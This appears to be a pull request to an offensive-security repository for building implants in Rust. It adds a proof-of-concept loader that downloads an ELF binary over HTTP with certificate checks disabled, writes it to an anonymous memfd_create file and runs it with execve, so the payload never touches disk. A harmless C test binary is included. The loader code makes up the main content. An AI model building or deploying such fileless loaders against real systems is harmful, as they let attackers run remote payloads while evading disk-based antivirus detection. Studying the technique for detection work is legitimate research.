### PR TITLE
[New example] - Added memfd_create

### DIFF
--- a/README.md
+++ b/README.md
@@ -61,6 +61,7 @@ My experiments in weaponizing [Rust](https://www.rust-lang.org/) for implant dev
 | [Injection_AES_Loader](../master/Injection_AES_Loader/src/main.rs)                                     | NtTestAlert Injection with AES decryption                                                                                                                                                |
 | [Litcrypt_String_Encryption](../master/Litcrypt_String_Encryption/src/main.rs)                         | Using the [Litcrypt](https://github.com/anvie/litcrypt.rs) crate to encrypt literal strings at rest and in memory to defeat static AV.                                                                                      |
 | [Api Hooking](../master/apihooking/src/main.rs)                         | Api Hooking using detour library                                                                                      |
+| [memfd_create](../master/memfd_create/src/main.rs)                         | Execute payloads from memory using the memfd_create technique                                                                                      |
 
 ## Compiling the examples in this repo
 

--- a/memfd_create/.gitignore
+++ b/memfd_create/.gitignore
@@ -1,0 +1,2 @@
+/target
+/.vscode

--- a/memfd_create/Cargo.toml
+++ b/memfd_create/Cargo.toml
@@ -1,0 +1,10 @@
+[package]
+name = "memfd_create-rs"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+libc = "0.2.126"
+reqwest = {version = "0.11.10", features = ["blocking"]}

--- a/memfd_create/README.md
+++ b/memfd_create/README.md
@@ -1,0 +1,9 @@
+# memfd_create-rs
+
+Load binaries into memory and execute them without touching disk.
+
+MITRE ID: T1620
+
+A simple PoC C code can be found inside `src` folder.
+
+Main program will download the ELF and execute it from memory using the `memfd_create` technique.

--- a/memfd_create/src/bar.c
+++ b/memfd_create/src/bar.c
@@ -1,0 +1,20 @@
+/*
+compile and deploit it on a HTTP server: 
+gcc bar.c bar
+
+*/
+
+#include <stdio.h>
+
+int main() {
+    FILE *fptr;
+
+    fptr = fopen("/tmp/woot.txt", "w+");
+    if (!fptr) {
+        printf("Something went wrong");
+    }
+    fprintf(fptr, "%s", "hello from memory");
+    fclose(fptr);
+
+    return 0;
+}

--- a/memfd_create/src/main.rs
+++ b/memfd_create/src/main.rs
@@ -1,0 +1,46 @@
+use libc::{c_char, execve, getpid, memfd_create, write};
+use reqwest;
+use std::ffi::CString;
+
+fn download_elf() -> Vec<u8> {
+    let url = "http://127.0.0.1:9090/bar";
+    let client = reqwest::blocking::Client::builder()
+        .danger_accept_invalid_certs(true)
+        .build()
+        .unwrap();
+    let binary = client.get(url).send().unwrap().bytes().unwrap();
+    binary.to_vec()
+}
+
+fn main() {
+    /* casting &str to *const c_char */
+    let rs_name: &str = "foo";
+    let c_str = CString::new(rs_name).unwrap();
+    let c_name = c_str.as_ptr() as *const c_char;
+
+    let elf = download_elf();
+
+    unsafe {
+        let c_elf = elf.as_ptr();
+        let fd = memfd_create(c_name, 0);
+        let pid = getpid();
+
+        println!("[+] PID: {}", pid);
+        println!("[+] File descriptor: {:?}", fd);
+
+        let written_bytes = write(fd, c_elf as _, elf.len());
+
+        if written_bytes != 0 {
+            println!("[+] Memory written!");
+        }
+
+        let path = format!("/proc/{}/fd/{}", pid, fd);
+        let cs_path = CString::new(path).unwrap();
+        let c_path = cs_path.as_ptr() as *const c_char;
+
+        println!("[+] Full path at address: {:?}", c_path);
+        println!("[+] Trying to execute ELF from memory...");
+
+        execve(c_path, std::ptr::null(), std::ptr::null());
+    }
+}


### PR DESCRIPTION
I've developed a PoC for the memfd_create technique, which will allow to execute payloads from memory. A C code which will create a file in /tmp/ is added into /src too as a simple example.